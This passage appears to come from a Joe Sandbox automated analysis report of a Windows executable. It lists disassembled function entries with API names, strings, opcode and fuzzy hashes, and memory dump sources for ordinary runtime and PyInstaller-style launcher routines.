                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                          • String ID: csm$f
                                                                                                                                          • API String ID: 2395640692-629598281
                                                                                                                                          • Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                                                                                          • Instruction ID: 0778660459c1b780e20537335d482f129cd78d9725024e5f1132601749ed9aa9
                                                                                                                                          • Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                                                                                          • Instruction Fuzzy Hash: 81518132E19A0286D754DB29F408B69B795FB45FACF518130EA4E87748FF38E94187C4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                          • Opcode ID: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
                                                                                                                                          • Instruction ID: 6254cc7d1004f8280377dd2be61239d1b67a1269013cdc6e232e69011fbadc11
                                                                                                                                          • Opcode Fuzzy Hash: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
                                                                                                                                          • Instruction Fuzzy Hash: 2C318176A18E8285EB24DF35E8551F9A360FF8ABA8F400135EA4D8BB59EF3CD104C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
                                                                                                                                            • Part of subcall function 00007FF61D328570: GetLastError.KERNEL32(00000000,00007FF61D322A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D328597
                                                                                                                                            • Part of subcall function 00007FF61D328570: FormatMessageW.KERNEL32 ref: 00007FF61D3285C6
                                                                                                                                            • Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A
                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF61D322AF0
                                                                                                                                          • MessageBoxA.USER32 ref: 00007FF61D322B0C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                                                                          • API String ID: 2806210788-2410924014
                                                                                                                                          • Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                                                                                          • Instruction ID: d52ddbf1433157318d4a07528fbdea790f699cc07e341500cadedf667591f9f3
                                                                                                                                          • Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                                                                                          • Instruction Fuzzy Hash: 41315872A28E8191E634DB20F4516DAA364FF85FD4F804136EA8D83A59EF3CD705CB80
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                          • Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                                                                                          • Instruction ID: 3c8cfaf031e44254b0857547ba2147927c37fd18421593aefe818737cf1c508a
                                                                                                                                          • Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                                                                                          • Instruction Fuzzy Hash: BEF06271F09F0291FB188B24E84437A9320AF4AF71F541235D96E862E4EF2DD445C350
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                          • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                          • Instruction ID: d077b85c5747253178703e3a8c205bf1d9aad8a045c6c4fef06b8b88206bb7bb
                                                                                                                                          • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                          • Instruction Fuzzy Hash: 14117036E1DE4301F7541568E84637A90406F9BB74F09063CEA6E873EAFF2EA8414224
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BA6F
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BA8E
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BAB6
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BAC7
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BAD8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Value
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                          • Opcode ID: 265f34380d67657989a0cfe7ba8fe7e8e2f3d4f226bb85804e174d5fdd11ec01
                                                                                                                                          • Instruction ID: 2e30021089eae6329cc8568cde704e077da3e9816d231479578b535a04a76596
                                                                                                                                          • Opcode Fuzzy Hash: 265f34380d67657989a0cfe7ba8fe7e8e2f3d4f226bb85804e174d5fdd11ec01
                                                                                                                                          • Instruction Fuzzy Hash: AA113D31E08E8261FA98D325DB51179D2915F46FB0F548334E87EC66D6FE6CE5018200
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Value
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                          • Opcode ID: 8c16e6d9311cdbb9998562dc17313de43228e32bcfe8a9d2b657955b0bb400fb
                                                                                                                                          • Instruction ID: e01b494e4e2b7234c604de643903c204b05d9335e709abb1847742fc70c62e31
                                                                                                                                          • Opcode Fuzzy Hash: 8c16e6d9311cdbb9998562dc17313de43228e32bcfe8a9d2b657955b0bb400fb
                                                                                                                                          • Instruction Fuzzy Hash: 7B112730E09A0762FA6CE331D61227AD2814F47F70F584734D87ECA2D2FE2DB5418251
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: verbose
                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                          • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                          • Instruction ID: c32cf88514697760d1f8f1270f3dd306ddd9ae91f4b40d26b45c55ae2b7de487
                                                                                                                                          • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                          • Instruction Fuzzy Hash: 4591D132A08E46AAF721CE25DA5077DB790AB46FA4F844136DA5E873D5EF3CE445E300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                          • Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                                                                                          • Instruction ID: 3bb4d8498f54eb6b3f16bb270587afd62da913b2342c7b61756b37d6950e8f70
                                                                                                                                          • Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                                                                                          • Instruction Fuzzy Hash: BE81A472F0CE3285F7A44F25861027CFAA0AB13F64F558035CA49D72A5FF2EE9019781
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                          • Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                                                                                          • Instruction ID: 1d1acb0f853333f8bb35827b21edaabe389834e98da5ee2237ad7e6da46b125c
                                                                                                                                          • Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                                                                                          • Instruction Fuzzy Hash: 75615A37A08B458AE7108F66D4413ADB7B0FB4ABACF144225EE4D57B99DF38E145C780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                          • String ID: csm$csm
                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                          • Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                                                                                          • Instruction ID: 132664ff216d08bff8d47310fd46e8a201b167d227c5b27bb9f301f91d44ba14
                                                                                                                                          • Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                                                                                          • Instruction Fuzzy Hash: 9C518E33D08A8286EB748F369544269B7A0FB56FACF144135DA9D87B95EF3CE450CB80
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                                                                          • API String ID: 1878133881-2410924014
                                                                                                                                          • Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                                                                                          • Instruction ID: 80bbf8d9f38651897a2546485680286c4ae46bb2c83a622795dc227b818021b2
                                                                                                                                          • Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                                                                                          • Instruction Fuzzy Hash: 6A315872A28E8191E634DB20E4516DAA354FF85FD4F804136E68D87A99EF3CD705CB80
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D323F01
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastMessageModuleName
                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                          • API String ID: 2581892565-1977442011
                                                                                                                                          • Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                                                                                          • Instruction ID: 12baf1a1772612dce50f33d52f430dd6c6cfed6877764662a066e99de32c8b50
                                                                                                                                          • Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                                                                                          • Instruction Fuzzy Hash: CE014431F1DF4291FA649730E8553B5D2A1AF5AFA8F800036E94DC6696FF1CE1448750
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                          • Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                                                                                          • Instruction ID: 1f2a399893ab5ee3ce8a15938b745603c6322d028db4027da54e2239bd193247
                                                                                                                                          • Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                                                                                          • Instruction Fuzzy Hash: 31D10532B19E8199E711CF79D5402ACB7B1FB46FA8B048235DE5D97B99EE38D406C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                          • Opcode ID: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
                                                                                                                                          • Instruction ID: a7c981ae6bd9edabfcad71c87052b8acc7c84fb51865dce2b4c0a866be557cf5
                                                                                                                                          • Opcode Fuzzy Hash: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
                                                                                                                                          • Instruction Fuzzy Hash: 52517D32A08A819AFB54DFB1D5903BDA3A1AF49FA8F148534DE0D876C9EF38E4409740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                          • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                          • Instruction ID: 0c91e0023f8a4a7ee93257e15b799b7baf6aed4700cfb1e66e5c6ff4a037269f
                                                                                                                                          • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                          • Instruction Fuzzy Hash: 5611E935F0894242F6548B7AF9842B99291EF86FA4F448030DB494AB8EEE3DD5C14640
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

